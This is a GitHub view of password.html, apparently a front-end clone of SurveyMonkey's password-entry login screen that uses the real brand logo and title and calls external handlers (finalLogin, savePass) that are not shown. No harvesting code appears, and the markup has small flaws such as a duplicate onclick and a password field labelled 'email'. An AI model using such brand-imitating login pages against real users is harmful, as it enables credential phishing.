-
Notifications
You must be signed in to change notification settings - Fork 1
/
password.html
72 lines (71 loc) · 2.16 KB
/
password.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="stylesheet" href="./styles/page_loading_animation.css" />
<script src="./components/page_loading_animation.js"></script>
<script src="https://kit.fontawesome.com/fb700f3d70.js"></script>
<link rel="stylesheet" href="./styles/password.css" />
<title>SurveyMonkey - Enter Password</title>
<link
rel="icon"
href="./images/download-modified.png"
type="image/x-icon"
/>
</head>
<body onload="loaderAnimation()">
<div id="wrapper"><div class="loader"></div></div>
<div id="loginbox">
<div id="logo">
<img
src="https://prod.smassets.net/assets/website/2.182.0/images/logo-surveymonkey.svg"
alt="logo"
/>
</div>
<div id="form">
<div class="signup">
<p>
<a href="login.html"><i class="fa-solid fa-angle-left"></i> Back</a>
</p>
</div>
<h1>Enter password</h1>
<label for="password" id="showpass">Password</label>
<div class="input-email">
<input
onkeypress="submitOnEnter(event)"
oninput="enableButton()"
class="pass-input"
id="email"
type="password"
aria-required="true"
aria-label="Email address"
/>
</div>
<div class="forgotmail">
<a href="#">Forgot password?</a>
</div>
<button
onclick="finalLogin()"
id="submitButton"
class="button-disabled"
onclick="savePass()"
type="submit"
disabled="true"
>
Log In
</button>
</div>
</div>
<div class="bottom">
<a href="#"> Help </a>
<a href="#"> Terms of Use </a>
<a href="#"> Privacy Notice </a>
<a href="#"> California Privacy Notice </a>
<a href="#"> Cookies Policiy </a>
<a href="#"> Cookie Preferences </a>
</div>
</body>
<script src="./scripts/password.js"></script>
</html>